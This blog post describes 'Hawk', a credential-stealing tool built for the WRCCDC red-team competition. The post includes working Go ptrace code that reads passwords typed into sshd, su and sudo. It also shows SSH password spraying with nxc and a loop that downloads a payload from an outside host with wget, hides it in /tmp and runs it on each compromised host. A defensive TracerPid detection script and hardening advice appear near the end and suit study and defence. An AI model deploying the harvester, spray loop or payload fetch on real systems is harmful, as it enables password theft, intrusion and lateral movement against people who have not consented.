Hawk: Automated Credential Harvesting in WRCCDC

There is a moment in every WRCCDC competition where the game shifts. You stop thinking about one host at a time, and start thinking about gravity. One good credential can pull an entire subnet toward you if you can catch it fast enough.
This post is the story of how Hawk happened, why I built it, and why it keeps paying rent in competitions. It is also a love letter to a tool that came before it, 3snake, and the very real pain of doing credential harvesting manually at scale.
If you want the code first, here it is: https://github.com/platsecurity/Hawk
The Old Way: 3snake Was Brilliant, But My Wrists Hated It
Let me start with credit where it is due. 3snake is one of those tools that makes you grin when you first read it. It quietly attaches to sshd, passwd, su and sudo, watches the password auth syscalls, and pulls credentials straight out of process memory without patching binaries or dropping kernel modules. Read only. Transparent. Clean.
In early competitions, 3snake gave us something that felt unfair in the best way. We would pop a Linux box, plant 3snake, and wait. The blue team would rotate passwords, log back in, and suddenly we had their shiny new creds. That loop alone wins red vs blue team competitions.
But there was a catch.
3snake was built for the real world, not for a ten-host-per-minute credential firehose. In WRCCDC, the volume is silly. Credentials come in bursts, from multiple hosts, while you are already juggling persistence, pivots, lateral movement, and the clock. Capturing those creds manually and reusing them fast enough became a huge pain. You would see a password, copy it, paste it into your notes, try it somewhere else, miss a timing window, then do it again. At scale, that is a slow leak.
I wanted the genius of 3snake, without the manual glue.
So I built Hawk.

What Hawk Is (One Sentence, Then the Real One)
Technical definition: Hawk is a lightweight Golang tool that silently intercepts SSH, su, and (soon) sudo credentials on Linux in real time, by tracing authentication syscalls and reading the password out of the target's memory. It does not patch the target binary or write to its memory; it attaches, watches, and collects. Because sshd, su and sudo run as root, attaching to them needs root or CAP_SYS_PTRACE on the host, which is why Hawk goes down after the foothold rather than before it.
The real one is simpler: Hawk is 3snake adapted for competition tempo, with the boring parts automated and the output piped exactly where I need it.
Under the Hood: The Part Where the Bird Learns to Hunt
Hawk does two things over and over:
1. Find Interesting Processes
It walks /proc to detect new sshd, su, and sudo related processes that are about to handle password auth.
2. Attach, Watch the Right Syscalls, and Read the Password
Using ptrace, Hawk attaches to the target process and stops it at the read or write syscalls tied to password-based authentication. A read buffer is only filled when the syscall returns, so reads are inspected at the syscall-exit stop; a write buffer is already populated at entry. When the password is in the buffer, Hawk copies it out of the target's memory over ptrace and formats it as a credential event.
There is something deeply satisfying about this approach. It is surgical. No binary patching. No LD_PRELOAD trickery. No kernel module that screams at every integrity monitor. The process never knows you were there.
If you have ever stared at the raw syscall stream for sudo, you already know the core idea. sudo reads the password one byte at a time, with echo turned off, from the tty it opened for the prompt. If you can trace those reads, you can reconstruct the string as it flows.
You do not have to be loud to be effective. You just have to be present at the right microsecond.
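What that trace loop looks like in practice, as an added example rather than Hawk's or 3snake's own source: a minimal Linux/amd64 ptrace tracer in Go that attaches to one PID, stops it at every syscall and, whenever read(2) returns, copies the bytes that just landed in the tracee's buffer, then reassembles byte-at-a-time reads into the typed line. It assumes Linux on amd64 (the register names are architecture-specific), root or CAP_SYS_PTRACE, and one already-running target PID on the command line; it does not follow forks or watch the sshd write(2) path, both of which a real harvester needs.

```go
// Added example, not Hawk's or 3snake's code: a minimal Linux/amd64 ptrace tracer in
// the shape the post describes. Assumes root/CAP_SYS_PTRACE; no fork following.
package main

import (
	"fmt"
	"os"
	"runtime"
	"strconv"
	"syscall"
)

// lineAssembler rebuilds input that arrives one read at a time, keyed by (pid, fd).
// CR or LF ends a line; the empty line left behind by a CR+LF pair is dropped.
type lineAssembler struct{ buf map[[2]int][]byte }
func newLineAssembler() *lineAssembler { return &lineAssembler{buf: map[[2]int][]byte{}} }

// feed appends the bytes one read(2) returned on fd and returns every line they complete.
func (a *lineAssembler) feed(pid, fd int, data []byte) []string {
	key := [2]int{pid, fd}
	cur := a.buf[key]
	var done []string
	for _, b := range data {
		switch b {
		case '\n', '\r':
			if len(cur) > 0 {
				done = append(done, string(cur)) // string() copies, so cur can be reused
			}
			cur = cur[:0]
		default:
			cur = append(cur, b)
		}
	}
	a.buf[key] = cur
	return done
}

// traceReads attaches to pid, stops it at every syscall and, each time read(2)
// returns, copies the bytes that just landed in the tracee's buffer into the
// assembler; emit receives every completed line until the tracee exits. amd64
// layout: syscall number in Orig_rax, args in Rdi/Rsi/Rdx, return value in Rax.
func traceReads(pid int, emit func(pid int, line string)) error {
	runtime.LockOSThread() // every ptrace request must come from the attaching thread
	defer runtime.UnlockOSThread()
	if err := syscall.PtraceAttach(pid); err != nil {
		return fmt.Errorf("attach %d: %w", pid, err)
	}
	defer syscall.PtraceDetach(pid)
	var ws syscall.WaitStatus
	if _, err := syscall.Wait4(pid, &ws, 0, nil); err != nil {
		return err
	}
	// Bit 7 tags syscall stops so they are never mistaken for a real SIGTRAP.
	if err := syscall.PtraceSetOptions(pid, syscall.PTRACE_O_TRACESYSGOOD); err != nil {
		return err
	}
	asm, inSyscall, sig := newLineAssembler(), false, 0
	var regs syscall.PtraceRegs
	for {
		if err := syscall.PtraceSyscall(pid, sig); err != nil {
			return err
		}
		if _, err := syscall.Wait4(pid, &ws, 0, nil); err != nil || ws.Exited() || ws.Signaled() {
			return err
		}
		sig = 0
		switch ws.StopSignal() {
		case syscall.SIGTRAP | 0x80: // syscall stop, handled below
		case syscall.SIGTRAP: // post-execve trap: swallow it, never forward it
			continue
		default: // a real signal for the tracee: deliver it on the next resume
			sig = int(ws.StopSignal())
			continue
		}
		if inSyscall = !inSyscall; inSyscall {
			continue // entry stop: the read buffer is not filled yet
		}
		if err := syscall.PtraceGetRegs(pid, &regs); err != nil {
			return err
		}
		n := int64(regs.Rax) // bytes read, or -errno on failure
		if regs.Orig_rax != uint64(syscall.SYS_READ) || n <= 0 {
			continue
		}
		data := make([]byte, n)
		if _, err := syscall.PtracePeekData(pid, uintptr(regs.Rsi), data); err != nil {
			continue
		}
		for _, line := range asm.feed(pid, int(regs.Rdi), data) {
			emit(pid, line)
		}
	}
}

func main() {
	pid, err := strconv.Atoi(os.Args[len(os.Args)-1]) // usage: tracer <pid>
	if err == nil {
		err = traceReads(pid, func(pid int, line string) { fmt.Printf("pid=%d input=%q\n", pid, line) })
	}
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
}
```

Two details matter in Go specifically: every ptrace request has to come from the OS thread that did the attach, so the loop pins itself with runtime.LockOSThread, and syscall stops have to be told apart from the plain SIGTRAP the kernel raises after execve (sudo execs the command right after auth); forwarding that trap as a signal kills the tracee.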
The WRCCDC Loop: Where Hawk Turns One Foothold Into a Campaign
Here is the playbook I keep coming back to in WRCCDC. It works because it matches how blue teams behave under pressure.
Step 1: Compromise One Linux Host
Nothing fancy, just a foothold. Once I have root or equivalent, I am thinking about keeping the door open and expanding.
Step 2: Drop Hawk and Let It Perch
After the compromise, Hawk goes on the host as a background process. The goal is not to interact with it constantly, the goal is to let it quietly watch.
I kept adding obfuscation and evasion for competition use, but I am not going to burn those details here. The important thing is that Hawk is stable, low noise, and can sit there while everything else is on fire.
Step 3: Wait for the Blue Team to Do What They Always Do
In WRCCDC, blue teams rotate passwords early and often. They have to.
They log in with the new team password to validate changes, fix services, or just survive. That is the moment Hawk is built for. It catches the SSH password or sudo password as it is typed, then exfils it back to my box.
Step 4: Cred Reuse at Machine Speed
This is where Hawk beats my old manual workflow.
As soon as a new credential hits, I test it against other Linux hosts. I like NetExec (nxc) for this since it makes SSH spray and validation fast, consistent, and easy to script. If it works, I repipe it into the next batch of targets in that subnet, and suddenly one password becomes many sessions.
Here's what the automation looks like in practice:
# Hawk captures: jdavis:CompanyP@ss2024!
# Immediately test against subnet targets
nxc ssh 10.0.1.0/24 -u jdavis -p 'CompanyP@ss2024!' --continue-on-success
SSH    10.0.1.15    22    web-srv-01      [+] jdavis:CompanyP@ss2024! (Pwn3d!)
SSH    10.0.1.23    22    db-primary      [+] jdavis:CompanyP@ss2024! (Pwn3d!)
SSH    10.0.1.31    22    app-server-02   [+] jdavis:CompanyP@ss2024! (Pwn3d!)
SSH    10.0.1.44    22    backup-node     [+] jdavis:CompanyP@ss2024! (Pwn3d!)
SSH    10.0.1.67    22    monitoring-box  [+] jdavis:CompanyP@ss2024! (Pwn3d!)
# Deploy Hawk to all successful hosts (last octets of the hits above)
for host in 15 23 31 44 67; do
    nxc ssh 10.0.1.$host -u jdavis -p 'CompanyP@ss2024!' \
        -x "wget -q hawk.platformsecurity.com/a7f3c9e2 -O /tmp/.sys && chmod +x /tmp/.sys && nohup /tmp/.sys >/dev/null 2>&1 &"
done
# One credential → Five new Hawk instances harvesting in parallel
This is the moment the match tilts. The blue team thinks they are recovering. In reality, they just handed you the new keys.
Step 5: Repeat Until the Scoreboard Turns Into Confetti
Compromise, perch, harvest, reuse, pivot, repeat.
At the end of a good run you look up and realize you have a swarm. In one competition, the aftermath was over two hundred Sliver sessions across the environment.
That screenshot is still one of my favorites because it captures the entire point of Hawk. It is not about a single credential. It is about a feedback loop that scales faster than humans can.
Why It Dominates: The Boring Truth Behind the Wow Factor
Hawk wins in WRCCDC competitions for three reasons:
1. It Weaponizes Blue Team Hygiene
Password rotations are supposed to lock attackers out. Hawk turns them into lateral movement fuel.
2. It Removes the Human Bottleneck
3snake gave me the data, Hawk gives me the tempo. Automation is the difference between catching a credential and missing it while you are busy elsewhere.
3. It Is Built to Be Quiet and Reliable
Read-only memory harvesting through ptrace is hard to notice in a chaotic competition environment, and Hawk stays stable even when ten other things are happening at once. It is not invisible, though: for as long as Hawk is attached, the traced sshd, su or sudo carries Hawk's PID in the TracerPid field of its /proc/<pid>/status, and the attach itself is a ptrace syscall that auditd can record.
The wow factor is not magic. It is just speed plus patience.
Closing Thoughts: What I Am Building Next
Hawk exists because I wanted to take a great idea and tune it for the way competitions actually feel. 3snake showed the path. Hawk made the path fast enough to matter when the clock is brutal.
If you are a defender reading this, the takeaway is not despair. The takeaway is detection and response maturity. Watch for ptrace abuse (an auditd rule on the ptrace syscall, and any sshd, su or sudo whose /proc/<pid>/status shows a non-zero TracerPid), watch for strange process parenting (a hidden binary under /tmp that ended up with PID 1 as its parent after a nohup), watch for outbound webhook-style exfil, and assume any password typed on a compromised host is a password already lost. Yama's kernel.yama.ptrace_scope only helps at level 3: levels 1 and 2 still allow CAP_SYS_PTRACE, which root has, and root can lower them again with sysctl, while 3 refuses PTRACE_ATTACH outright and cannot be changed until reboot.
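The TracerPid check above, written out as an added example (not part of Hawk or any project mentioned here): a Go scan that parses every /proc/<pid>/status, reports any sshd, su, sudo or passwd process with a tracer attached, names the tracer and its parent, and prints the current Yama ptrace_scope. The watched process names, the finding layout and the sample status excerpts in the test are assumptions of the example; the /proc field names are Linux's own.

```go
// Added example, not part of Hawk: a defender-side check for the technique above.
// A ptrace tracer cannot hide from /proc: the traced process's /proc/<pid>/status
// carries the tracer's PID in its TracerPid field for as long as the attach lasts.
package main

import (
	"bufio"
	"fmt"
	"os"
	"path/filepath"
	"strconv"
	"strings"
)

// procStatus holds the fields of /proc/<pid>/status this check needs.
type procStatus struct {
	Name                 string
	Pid, PPid, TracerPid int
}

// parseStatus reads the "Key:\tvalue" lines of one status file.
func parseStatus(text string) (procStatus, error) {
	var st procStatus
	sc := bufio.NewScanner(strings.NewReader(text))
	for sc.Scan() {
		k, v, ok := strings.Cut(sc.Text(), ":")
		if !ok {
			continue
		}
		v = strings.TrimSpace(v)
		var err error
		switch k {
		case "Name":
			st.Name = v
		case "Pid":
			st.Pid, err = strconv.Atoi(v)
		case "PPid":
			st.PPid, err = strconv.Atoi(v)
		case "TracerPid":
			st.TracerPid, err = strconv.Atoi(v)
		}
		if err != nil {
			return st, fmt.Errorf("%s: bad value %q: %w", k, v, err)
		}
	}
	return st, nil
}

// authBinaries are the processes a 3snake/Hawk-style harvester attaches to (assumed list).
var authBinaries = map[string]bool{"sshd": true, "su": true, "sudo": true, "passwd": true}

// finding pairs a traced auth process with whatever is tracing it.
type finding struct {
	Victim, Tracer procStatus // Tracer is zero-valued if its status was unreadable
}

// tracedAuthProcesses is pure, so it runs over a saved snapshot as well as live /proc.
func tracedAuthProcesses(all []procStatus) []finding {
	byPid := make(map[int]procStatus, len(all))
	for _, st := range all {
		byPid[st.Pid] = st
	}
	var out []finding
	for _, st := range all {
		if st.TracerPid != 0 && authBinaries[st.Name] {
			out = append(out, finding{Victim: st, Tracer: byPid[st.TracerPid]})
		}
	}
	return out
}

// snapshotProc parses <root>/<pid>/status for every numeric directory under root.
func snapshotProc(root string) ([]procStatus, error) {
	entries, err := os.ReadDir(root)
	if err != nil {
		return nil, err
	}
	var all []procStatus
	for _, e := range entries {
		if _, err := strconv.Atoi(e.Name()); err != nil {
			continue
		}
		raw, err := os.ReadFile(filepath.Join(root, e.Name(), "status"))
		if err != nil {
			continue // the process exited between ReadDir and ReadFile
		}
		if st, err := parseStatus(string(raw)); err == nil {
			all = append(all, st)
		}
	}
	return all, nil
}

// yamaScope reads kernel.yama.ptrace_scope; only 3 blocks PTRACE_ATTACH for root.
func yamaScope(root string) (int, error) {
	raw, err := os.ReadFile(filepath.Join(root, "sys/kernel/yama/ptrace_scope"))
	if err != nil {
		return -1, err
	}
	return strconv.Atoi(strings.TrimSpace(string(raw)))
}

func main() {
	all, err := snapshotProc("/proc")
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	if scope, err := yamaScope("/proc"); err == nil {
		fmt.Printf("kernel.yama.ptrace_scope = %d\n", scope)
	}
	for _, f := range tracedAuthProcesses(all) {
		fmt.Printf("ALERT %s[%d] (parent %d) is traced by %q[%d] (parent %d)\n",
			f.Victim.Name, f.Victim.Pid, f.Victim.PPid, f.Tracer.Name, f.Tracer.Pid, f.Tracer.PPid)
	}
}
```

Run it as root from cron or a response playbook; a hit where the tracer is an unfamiliar name under /tmp whose parent is PID 1 is exactly the shape the deployment loop in step 4 leaves behind. Because the decision logic takes a parsed snapshot, the same function can be pointed at status files collected from a host during forensics.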
If you are a competitor, you already know the dopamine hit when a credential lands at the perfect time. This tool is me trying to bottle that moment and make it repeatable.
I will keep iterating, because the bird is still hungry.